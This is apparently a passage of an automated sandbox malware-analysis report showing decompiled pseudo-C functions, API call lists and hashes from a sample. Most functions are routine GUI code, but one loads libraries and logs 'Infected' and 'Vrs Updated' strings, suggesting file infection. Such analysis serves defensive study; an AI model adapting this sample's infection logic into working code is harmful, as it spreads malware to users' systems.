                                                    			E004265A0(void* __ebx) {
				struct HDC__* _v8;
				struct tagPALETTEENTRY _v1000;
				struct tagPALETTEENTRY _v1004;
				struct tagPALETTEENTRY _v1032;
				signed int _v1034;
				short _v1036;
				void* _t24;
				int _t53;
				intOrPtr _t60;
				void* _t62;
				void* _t63;

				_t62 = _t63;
				_v1036 = 0x300;
				_v1034 = 0x10;
				E004029DC(_t24, 0x40,  &_v1032);
				_v8 = GetDC(0);
				_push(_t62);
				_push(0x42669d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t63 + 0xfffffbf8;
				_t53 = GetDeviceCaps(_v8, 0x68);
				if(_t53 >= 0x10) {
					GetSystemPaletteEntries(_v8, 0, 8,  &_v1032);
					if(_v1004 != 0xc0c0c0) {
						GetSystemPaletteEntries(_v8, _t53 - 8, 8, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x424);
					} else {
						GetSystemPaletteEntries(_v8, _t53 - 8, 1,  &_v1004);
						GetSystemPaletteEntries(_v8, _t53 - 7, 7, _t62 + (_v1034 & 0x0000ffff) * 4 - 0x420);
						GetSystemPaletteEntries(_v8, 7, 1,  &_v1000);
					}
				}
				_pop(_t60);
				 *[fs:eax] = _t60;
				_push(0x4266a4);
				return ReleaseDC(0, _v8);
			}














                                                    0x004265a1
                                                    0x004265aa
                                                    0x004265b3
                                                    0x004265c7
                                                    0x004265d3
                                                    0x004265d8
                                                    0x004265d9
                                                    0x004265de
                                                    0x004265e1
                                                    0x004265ef
                                                    0x004265f4
                                                    0x00426609
                                                    0x00426618
                                                    0x0042667f
                                                    0x0042661a
                                                    0x0042662d
                                                    0x0042664b
                                                    0x0042665f
                                                    0x0042665f
                                                    0x00426618
                                                    0x00426686
                                                    0x00426689
                                                    0x0042668c
                                                    0x0042669c

                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 004265CE
                                                    • GetDeviceCaps.GDI32(?,00000068), ref: 004265EA
                                                    • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 00426609
                                                    • GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 0042662D
                                                    • GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 0042664B
                                                    • GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 0042665F
                                                    • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0042667F
                                                    • ReleaseDC.USER32 ref: 00426697
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: EntriesPaletteSystem$CapsDeviceRelease
                                                    • String ID:
                                                    • API String ID: 1781840570-0
                                                    • Opcode ID: 0eb73cb19fcbebc97ca0d3b42b0b75fc3d023da046d704aae5c56db498695ba3
                                                    • Instruction ID: 805600ea143b9581a1e299db5fe5220b0691e616ed58bf122693d2d560596f25
                                                    • Opcode Fuzzy Hash: 0eb73cb19fcbebc97ca0d3b42b0b75fc3d023da046d704aae5c56db498695ba3
                                                    • Instruction Fuzzy Hash: 592174B1A04218FAEB10DBA5CD85F9E72ACEB08704F5104A6FB04F61C1D678AE54DB29
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00434530 Relevance: 12.1, APIs: 8, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00434530(void* __eax, void* __edx, void* __ebp, void* __eflags) {
				struct tagTEXTMETRICA _v84;
				signed int _v100;
				void* __ebx;
				void* _t15;
				char* _t20;
				signed int _t21;
				signed int _t23;
				struct HDC__* _t29;
				signed int _t30;
				signed int _t32;
				signed int _t33;
				void* _t34;
				void* _t40;
				struct tagTEXTMETRICA* _t42;

				_t40 = __eax;
				_t29 = GetDC(0);
				GetTextMetricsA(_t29, _t42);
				_t15 = SelectObject(_t29, E00424E24( *((intOrPtr*)(_t40 + 0x68)), _t29, _t34));
				GetTextMetricsA(_t29,  &_v84);
				SelectObject(_t29, _t15);
				ReleaseDC(0, _t29);
				_t20 =  *0x49da40; // 0x49eb1c
				if( *_t20 == 0) {
					_t30 = _t42->tmHeight;
					_t21 = _v100;
					if(_t30 > _t21) {
						_t30 = _t21;
					}
					_t23 = GetSystemMetrics(6) << 2;
					if(_t30 < 0) {
						_t30 = _t30 + 3;
					}
					_t32 = _t23 + (_t30 >> 2);
				} else {
					if( *((char*)(_t40 + 0x1a5)) == 0) {
						_t33 = 6;
					} else {
						_t33 = 8;
					}
					_t32 = GetSystemMetrics(6) * _t33;
				}
				return E0043A75C(_t40, _v100 + _t32);
			}

















                                                    0x00434536
                                                    0x0043453f
                                                    0x00434543
                                                    0x00434552
                                                    0x0043455f
                                                    0x00434566
                                                    0x0043456e
                                                    0x00434573
                                                    0x0043457b
                                                    0x0043459f
                                                    0x004345a2
                                                    0x004345a8
                                                    0x004345aa
                                                    0x004345aa
                                                    0x004345b3
                                                    0x004345b8
                                                    0x004345ba
                                                    0x004345ba
                                                    0x004345c2
                                                    0x0043457d
                                                    0x00434584
                                                    0x0043458d
                                                    0x00434586
                                                    0x00434586
                                                    0x00434586
                                                    0x0043459b
                                                    0x0043459b
                                                    0x004345d7

                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 0043453A
                                                    • GetTextMetricsA.GDI32(00000000), ref: 00434543
                                                      • Part of subcall function 00424E24: CreateFontIndirectA.GDI32(?), ref: 00424F62
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00434552
                                                    • GetTextMetricsA.GDI32(00000000,?), ref: 0043455F
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00434566
                                                    • ReleaseDC.USER32 ref: 0043456E
                                                    • GetSystemMetrics.USER32 ref: 00434594
                                                    • GetSystemMetrics.USER32 ref: 004345AE
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
                                                    • String ID:
                                                    • API String ID: 1583807278-0
                                                    • Opcode ID: ca349bb18a4b4453b776530d288914abec228c4fb22e44048b16066f4dcf4a7d
                                                    • Instruction ID: 5c0f3d8754ac9f53a552d955726f62212e9f387cfb0fc4aa99143b90913ccd9a
                                                    • Opcode Fuzzy Hash: ca349bb18a4b4453b776530d288914abec228c4fb22e44048b16066f4dcf4a7d
                                                    • Instruction Fuzzy Hash: 2111A951F083003BE31066798CC2B6B65C8DB99358F84183AF646D73D2D57CBC41836B
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044A960 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 187windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 84%
                                                    			E0044A960(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v13;
				struct tagMENUITEMINFOA _v61;
				char _v68;
				intOrPtr _t103;
				CHAR* _t109;
				char _t115;
				short _t149;
				void* _t154;
				intOrPtr _t161;
				intOrPtr _t184;
				struct HMENU__* _t186;
				int _t190;
				void* _t192;
				intOrPtr _t193;
				void* _t196;
				void* _t205;

				_t155 = __ecx;
				_push(__esi);
				_push(__edi);
				_v68 = 0;
				_v12 = 0;
				_v5 = __ecx;
				_t186 = __edx;
				_t154 = __eax;
				_push(_t196);
				_push(0x44abbb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t196 + 0xffffffc0;
				if( *((char*)(__eax + 0x3e)) == 0) {
					L22:
					_pop(_t161);
					 *[fs:eax] = _t161;
					_push(0x44abc2);
					E004049C0( &_v68);
					return E004049C0( &_v12);
				}
				E00404A58( &_v12,  *((intOrPtr*)(__eax + 0x30)));
				if(E0044C8DC(_t154) <= 0) {
					__eflags =  *((short*)(_t154 + 0x60));
					if( *((short*)(_t154 + 0x60)) == 0) {
						L8:
						if((GetVersion() & 0x000000ff) < 4) {
							_t190 =  *(0x49bdf0 + ((E00404DCC( *((intOrPtr*)(_t154 + 0x30)), 0x44abe0) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x0049BDE4 |  *0x0049BDD4 |  *0x0049BDDC | 0x00000400;
							_t103 = E0044C8DC(_t154);
							__eflags = _t103;
							if(_t103 <= 0) {
								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E00404E80(_v12));
							} else {
								_t109 = E00404E80( *((intOrPtr*)(_t154 + 0x30)));
								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E0044AE70(_t154, _t186, _t190), _t109);
							}
							goto L22;
						}
						_v61.cbSize = 0x2c;
						_v61.fMask = 0x3f;
						_t192 = E0044CE98(_t154);
						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E0044C4B4(_t154) == 0) {
							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
								L14:
								_t115 = 0;
								goto L16;
							}
							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
							if(_t205 == 0) {
								goto L15;
							}
							goto L14;
						} else {
							L15:
							_t115 = 1;
							L16:
							_v13 = _t115;
							_v61.fType =  *(0x49be24 + ((E00404DCC( *((intOrPtr*)(_t154 + 0x30)), 0x44abe0) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x0049BE1C |  *0x0049BDF8 |  *0x0049BE2C |  *0x0049BE34;
							_v61.fState =  *0x0049BE04 |  *0x0049BE14 |  *0x0049BE0C;
							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
							_v61.hSubMenu = 0;
							_v61.hbmpChecked = 0;
							_v61.hbmpUnchecked = 0;
							_v61.dwTypeData = E00404E80(_v12);
							if(E0044C8DC(_t154) > 0) {
								_v61.hSubMenu = E0044AE70(_t154, _t186, _t192);
							}
							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
							goto L22;
						}
					}
					_t193 =  *((intOrPtr*)(_t154 + 0x64));
					__eflags = _t193;
					if(_t193 == 0) {
						L7:
						_push(_v12);
						_push(0x44abd4);
						L00449FC4( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
						_push(_v68);
						E00404D40();
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t193 + 0x64));
					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
						goto L7;
					}
					_t184 =  *0x449854; // 0x4498a0
					_t149 = L00403D78( *((intOrPtr*)(_t193 + 4)), _t184);
					__eflags = _t149;
					if(_t149 != 0) {
						goto L8;
					}
					goto L7;
				}
				_v61.hSubMenu = E0044AE70(_t154, _t186, __esi);
				goto L8;
			}





















                                                    0x0044a960
                                                    0x0044a967
                                                    0x0044a968
                                                    0x0044a96b
                                                    0x0044a96e
                                                    0x0044a971
                                                    0x0044a974
                                                    0x0044a976
                                                    0x0044a97a
                                                    0x0044a97b
                                                    0x0044a980
                                                    0x0044a983
                                                    0x0044a98a
                                                    0x0044ab9d
                                                    0x0044ab9f
                                                    0x0044aba2
                                                    0x0044aba5
                                                    0x0044abad
                                                    0x0044abba
                                                    0x0044abba
                                                    0x0044a996
                                                    0x0044a9a4
                                                    0x0044a9b2
                                                    0x0044a9b7
                                                    0x0044a9fc
                                                    0x0044aa0a
                                                    0x0044ab56
                                                    0x0044ab5e
                                                    0x0044ab63
                                                    0x0044ab65
                                                    0x0044ab98
                                                    0x0044ab67
                                                    0x0044ab6a
                                                    0x0044ab7f
                                                    0x0044ab7f
                                                    0x00000000
                                                    0x0044ab65
                                                    0x0044aa10
                                                    0x0044aa17
                                                    0x0044aa25
                                                    0x0044aa29
                                                    0x0044aa40
                                                    0x0044aa4e
                                                    0x0044aa4e
                                                    0x00000000
                                                    0x0044aa4e
                                                    0x0044aa4a
                                                    0x0044aa4c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0044aa52
                                                    0x0044aa52
                                                    0x0044aa52
                                                    0x0044aa54
                                                    0x0044aa54
                                                    0x0044aaa3
                                                    0x0044aaca
                                                    0x0044aad1
                                                    0x0044aad6
                                                    0x0044aadb
                                                    0x0044aae0
                                                    0x0044aaeb
                                                    0x0044aaf7
                                                    0x0044ab00
                                                    0x0044ab00
                                                    0x0044ab0c
                                                    0x00000000
                                                    0x0044ab0c
                                                    0x0044aa29
                                                    0x0044a9b9
                                                    0x0044a9bc
                                                    0x0044a9be
                                                    0x0044a9d8
                                                    0x0044a9d8
                                                    0x0044a9db
                                                    0x0044a9e7
                                                    0x0044a9ec
                                                    0x0044a9f7
                                                    0x00000000
                                                    0x0044a9f7
                                                    0x0044a9c0
                                                    0x0044a9c4
                                                    0x00000000
                                                    0x00000000
                                                    0x0044a9c9
                                                    0x0044a9cf
                                                    0x0044a9d4
                                                    0x0044a9d6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0044a9d6
                                                    0x0044a9ad
                                                    0x00000000

                                                    APIs
                                                    • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 0044AB0C
                                                    • GetVersion.KERNEL32(00000000,0044ABBB), ref: 0044A9FC
                                                      • Part of subcall function 0044AE70: CreatePopupMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE8B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Menu$CreateInsertItemPopupVersion
                                                    • String ID: ,$?
                                                    • API String ID: 133695497-2308483597
                                                    • Opcode ID: ce329fbcfb68304f05595de6c1e6c5ccc5445e86f25c9360cd087edaa36d7743
                                                    • Instruction ID: 398804152d519dd2ee62b9937964e6d4d0d5c4b5bb315d29c079f0e0da2fd4ec
                                                    • Opcode Fuzzy Hash: ce329fbcfb68304f05595de6c1e6c5ccc5445e86f25c9360cd087edaa36d7743
                                                    • Instruction Fuzzy Hash: 4861E270A042449BEB10EF79D881A9A77FAFF09304F04457AEA44E7356E738EC55C749
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004776D4 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168libraryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E004776D4(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8) {
				void* _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				void* __ecx;
				void* _t95;
				char _t96;
				struct HINSTANCE__* _t107;
				struct HINSTANCE__* _t109;
				void* _t112;
				struct HINSTANCE__* _t113;
				struct HINSTANCE__* _t132;
				intOrPtr _t156;
				intOrPtr _t180;
				intOrPtr _t191;
				intOrPtr _t205;
				intOrPtr _t206;
				intOrPtr _t210;

				_t203 = __esi;
				_t202 = __edi;
				_t205 = _t206;
				_t156 = 7;
				do {
					_push(0);
					_push(0);
					_t156 = _t156 - 1;
				} while (_t156 != 0);
				_push(_t156);
				_t1 =  &_v8;
				 *_t1 = _t156;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v12);
				E00404E70(_v16);
				_push(_t205);
				_push(0x4778dd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t206;
				if( *((intOrPtr*)( *_v8 + 0x14))() - 1 < 0) {
					L13:
					_pop(_t180);
					 *[fs:eax] = _t180;
					_push(0x4778e4);
					E004049E4( &_v68, 0xb);
					return E004049E4( &_v16, 2);
				}
				_t95 =  *((intOrPtr*)( *_v8 + 0x14))() - 1;
				if(_t95 < 0) {
					goto L13;
				}
				_t96 = _t95 + 1;
				_t210 = _t96;
				_v24 = _t96;
				_v20 = 0;
				do {
					 *((intOrPtr*)( *_v8 + 0xc))();
					if(E00409A48(_v28, _t210) != 0) {
						 *[fs:eax] = _t206;
						_t146 =  *_v8;
						 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x47789f, _t205);
						 *0x49ec78 = LoadLibraryA(E00404E80(_v32));
						_t107 =  *0x49ec78; // 0x0
						if(E004770E4(_t107,  *_v8, _v16, _t202, _t203) != 0) {
							_t109 =  *0x49ec78; // 0x0
							E0047717C(_t109, _t146,  &_v48, _v16, _t202, _t203);
							_t112 = E00409628(_v48, _t205, __eflags);
							__eflags = _t112 - _a8;
							if(_t112 >= _a8) {
								_t113 =  *0x49ec78; // 0x0
								FreeLibrary(_t113);
								 *((intOrPtr*)( *_v8 + 0xc))();
								E00404CCC( &_v64, _v68, "Infected Canceled -> ");
								 *((intOrPtr*)( *_v8 + 0x20))();
							} else {
								 *((intOrPtr*)( *_v8 + 0xc))();
								E004774A8(_v52,  *_v8, _v12, _t202, _t203, 1);
								 *((intOrPtr*)( *_v8 + 0xc))();
								E00404CCC( &_v56, _v60, "Vrs Updated -> ");
								 *((intOrPtr*)( *_v8 + 0x20))();
							}
						} else {
							_t132 =  *0x49ec78; // 0x0
							FreeLibrary(_t132);
							 *((intOrPtr*)( *_v8 + 0xc))();
							E004774A8(_v36,  *_v8, _v12, _t202, _t203, 0);
							 *((intOrPtr*)( *_v8 + 0xc))();
							E00404CCC( &_v40, _v44, "Completed -> ");
							 *((intOrPtr*)( *_v8 + 0x20))();
						}
						_pop(_t191);
						 *[fs:eax] = _t191;
					}
					_v20 = _v20 + 1;
					_t75 =  &_v24;
					 *_t75 = _v24 - 1;
				} while ( *_t75 != 0);
				goto L13;
			}

































                                                    0x004776d4
                                                    0x004776d4
                                                    0x004776d5
                                                    0x004776d8
                                                    0x004776dd
                                                    0x004776dd
                                                    0x004776df
                                                    0x004776e1
                                                    0x004776e1
                                                    0x004776e4
                                                    0x004776e5
                                                    0x004776e5
                                                    0x004776e8
                                                    0x004776e9
                                                    0x004776ea
                                                    0x004776eb
                                                    0x004776ee
                                                    0x004776f1
                                                    0x004776f7
                                                    0x004776ff
                                                    0x00477706
                                                    0x00477707
                                                    0x0047770c
                                                    0x0047770f
                                                    0x0047771b
                                                    0x004778b5
                                                    0x004778b7
                                                    0x004778ba
                                                    0x004778bd
                                                    0x004778ca
                                                    0x004778dc
                                                    0x004778dc
                                                    0x00477729
                                                    0x0047772c
                                                    0x00000000
                                                    0x00000000
                                                    0x00477732
                                                    0x00477732
                                                    0x00477733
                                                    0x00477736
                                                    0x0047773d
                                                    0x00477748
                                                    0x00477755
                                                    0x00477766
                                                    0x00477772
                                                    0x00477774
                                                    0x00477785
                                                    0x0047778d
                                                    0x00477799
                                                    0x004777fb
                                                    0x00477800
                                                    0x00477808
                                                    0x0047780d
                                                    0x00477810
                                                    0x0047785e
                                                    0x00477864
                                                    0x00477874
                                                    0x00477882
                                                    0x00477892
                                                    0x00477812
                                                    0x0047781f
                                                    0x0047782b
                                                    0x0047783b
                                                    0x00477849
                                                    0x00477859
                                                    0x00477859
                                                    0x0047779b
                                                    0x0047779b
                                                    0x004777a1
                                                    0x004777b3
                                                    0x004777bf
                                                    0x004777cf
                                                    0x004777dd
                                                    0x004777ed
                                                    0x004777ed
                                                    0x00477897
                                                    0x0047789a
                                                    0x0047789a
                                                    0x004778a9
                                                    0x004778ac
                                                    0x004778ac
                                                    0x004778ac
                                                    0x00000000

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00000006,00000000,00000000), ref: 00477780
                                                    • FreeLibrary.KERNEL32(00000000,00000000,?,?,?,?,?,00000006,00000000,00000000), ref: 004777A1
                                                    • FreeLibrary.KERNEL32(00000000,00000000,?,?,?,?,?,00000006,00000000,00000000), ref: 00477864
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Library$Free$Load
                                                    • String ID: Completed -> $Infected Canceled -> $Vrs Updated ->
                                                    • API String ID: 2391024519-3592865843
                                                    • Opcode ID: e5ca2df3611e2abfeeb87632b8b91ed25a998eaf615441498497ba08c9cca89b
                                                    • Instruction ID: 17185f43945d3bc0c2e5cc5bb4bd267fdef97e65ffff577caacc568d39ef9c26
                                                    • Opcode Fuzzy Hash: e5ca2df3611e2abfeeb87632b8b91ed25a998eaf615441498497ba08c9cca89b
                                                    • Instruction Fuzzy Hash: 32611878A04209DFDB04EFA5C8849EEB7B5FF48300F6180A6E904A7351CB34AE05CF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00442BD0 Relevance: 10.7, APIs: 7, Instructions: 156COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 68%
                                                    			E00442BD0(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				void _v12;
				intOrPtr _v16;
				int _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr* _t80;
				intOrPtr _t91;
				void* _t119;
				intOrPtr _t136;
				intOrPtr _t145;
				void* _t148;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t119 = __ecx;
				_v8 = __eax;
				_t145 =  *0x49de0c; // 0x49ebbc
				 *((char*)(_v8 + 0x210)) = 1;
				_push(_t148);
				_push(0x442da9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t148 + 0xffffffe0;
				E0043AFAC(_v8, __ecx, __ecx, _t145);
				_v16 = _v16 + 4;
				E0043C1D4(_v8,  &_v28);
				if(E00458218() <  *(_v8 + 0x4c) + _v24) {
					_v24 = E00458218() -  *(_v8 + 0x4c);
				}
				if(E00458224() <  *(_v8 + 0x48) + _v28) {
					_v28 = E00458224() -  *(_v8 + 0x48);
				}
				if(E0045820C() > _v28) {
					_v28 = E0045820C();
				}
				if(E00458200() > _v16) {
					_v16 = E00458200();
				}
				SetWindowPos(E00441704(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E00404C80(_t119) < 0x64 &&  *0x49bc1c != 0) {
					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
					if(_v12 != 0) {
						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
						if(_v12 == 0) {
							L00445E24( &_v36);
							if(_v32 <= _v24) {
							}
						}
						 *0x49bc1c(E00441704(_v8), 0x64,  *0x0049BD24 | 0x00040000);
					}
				}
				_t80 =  *0x49dbcc; // 0x49ebb8
				E0043EE38(_v8,  *((intOrPtr*)( *_t80 + 0x30)));
				ShowWindow(E00441704(_v8), 4);
				 *((intOrPtr*)( *_v8 + 0x7c))();
				_pop(_t136);
				 *[fs:eax] = _t136;
				_push(0x442db0);
				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
				_t91 = _v8;
				 *((char*)(_t91 + 0x210)) = 0;
				return _t91;
			}
















                                                    0x00442bde
                                                    0x00442bdf
                                                    0x00442be0
                                                    0x00442be1
                                                    0x00442be2
                                                    0x00442be4
                                                    0x00442be7
                                                    0x00442bf0
                                                    0x00442bf9
                                                    0x00442bfa
                                                    0x00442bff
                                                    0x00442c02
                                                    0x00442c0a
                                                    0x00442c0f
                                                    0x00442c19
                                                    0x00442c30
                                                    0x00442c3f
                                                    0x00442c3f
                                                    0x00442c54
                                                    0x00442c63
                                                    0x00442c63
                                                    0x00442c70
                                                    0x00442c79
                                                    0x00442c79
                                                    0x00442c86
                                                    0x00442c8f
                                                    0x00442c8f
                                                    0x00442cb5
                                                    0x00442ccd
                                                    0x00442cf5
                                                    0x00442cfe
                                                    0x00442d0d
                                                    0x00442d16
                                                    0x00442d24
                                                    0x00442d2f
                                                    0x00442d2f
                                                    0x00442d2f
                                                    0x00442d53
                                                    0x00442d53
                                                    0x00442cfe
                                                    0x00442d59
                                                    0x00442d66
                                                    0x00442d76
                                                    0x00442d80
                                                    0x00442d85
                                                    0x00442d88
                                                    0x00442d8b
                                                    0x00442d98
                                                    0x00442d9e
                                                    0x00442da1
                                                    0x00442da8

                                                    APIs
                                                    • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,00442DA9), ref: 00442CB5
                                                    • GetTickCount.KERNEL32 ref: 00442CBA
                                                    • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 00442CF5
                                                    • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 00442D0D
                                                    • AnimateWindow.USER32(00000000,00000064,00000001), ref: 00442D53
                                                    • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,00442DA9), ref: 00442D76
                                                      • Part of subcall function 00445E24: GetCursorPos.USER32(?,?,00442D29,00001018,00000000,00000000,00000000,00001016,00000000,?,00000000,00000000,000000FF,?,?,?), ref: 00445E28
                                                    • GetTickCount.KERNEL32 ref: 00442D90
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                                    • String ID:
                                                    • API String ID: 3024527889-0
                                                    • Opcode ID: 54a305cc09a56bb811332e01a25417af1ec60ed1c2f6bf35ac9e9272792253b9
                                                    • Instruction ID: ec947e6fb4e605e95c0b99b07f50ee8800e03fd8639e7176e4c102910f3e7fae
                                                    • Opcode Fuzzy Hash: 54a305cc09a56bb811332e01a25417af1ec60ed1c2f6bf35ac9e9272792253b9
                                                    • Instruction Fuzzy Hash: 1F513D74A00109DFEB10DF99C986E9EB7F5AF04304F6045AAF500EB395DB78AE40DB99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00458464 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E00458464(intOrPtr __eax, void* __ebx, void* __fp0) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				char _v20;
				void* _v24;
				struct HKL__* _v280;
				char _v536;
				char _v600;
				char _v604;
				char _v608;
				char _v612;
				void* _t60;
				intOrPtr _t106;
				intOrPtr _t111;
				void* _t117;
				void* _t118;
				intOrPtr _t119;
				void* _t129;

				_t129 = __fp0;
				_t117 = _t118;
				_t119 = _t118 + 0xfffffda0;
				_v612 = 0;
				_v8 = __eax;
				_push(_t117);
				_push(0x45860f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
					L11:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(0x458616);
					return E004049C0( &_v612);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = L00403BBC(1);
					E004049C0(_v8 + 0x38);
					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
					if(_t60 < 0) {
						L10:
						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
						E0041D5D8( *((intOrPtr*)(_v8 + 0x34)), 1);
						goto L11;
					} else {
						_v20 = _t60 + 1;
						_v24 =  &_v280;
						do {
							if(E00446294( *_v24) == 0) {
								goto L9;
							} else {
								_v608 =  *_v24;
								_v604 = 0;
								if(RegOpenKeyExA(0x80000002, E0040A5E4( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) {
									goto L9;
								} else {
									_push(_t117);
									_push(0x4585cb);
									_push( *[fs:eax]);
									 *[fs:eax] = _t119;
									_v12 = 0x100;
									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
										E00404C30( &_v612, 0x100,  &_v536);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
											E00404C30(_v8 + 0x38, 0x100,  &_v536);
										}
									}
									_pop(_t111);
									 *[fs:eax] = _t111;
									_push(0x4585d2);
									return RegCloseKey(_v16);
								}
							}
							goto L12;
							L9:
							_v24 = _v24 + 4;
							_t38 =  &_v20;
							 *_t38 = _v20 - 1;
						} while ( *_t38 != 0);
						goto L10;
					}
				}
				L12:
			}





















                                                    0x00458464
                                                    0x00458465
                                                    0x00458467
                                                    0x00458470
                                                    0x00458476
                                                    0x0045847b
                                                    0x0045847c
                                                    0x00458481
                                                    0x00458484
                                                    0x0045848e
                                                    0x004585f0
                                                    0x004585f8
                                                    0x004585fb
                                                    0x004585fe
                                                    0x0045860e
                                                    0x00458494
                                                    0x004584a3
                                                    0x004584ac
                                                    0x004584bf
                                                    0x004584c2
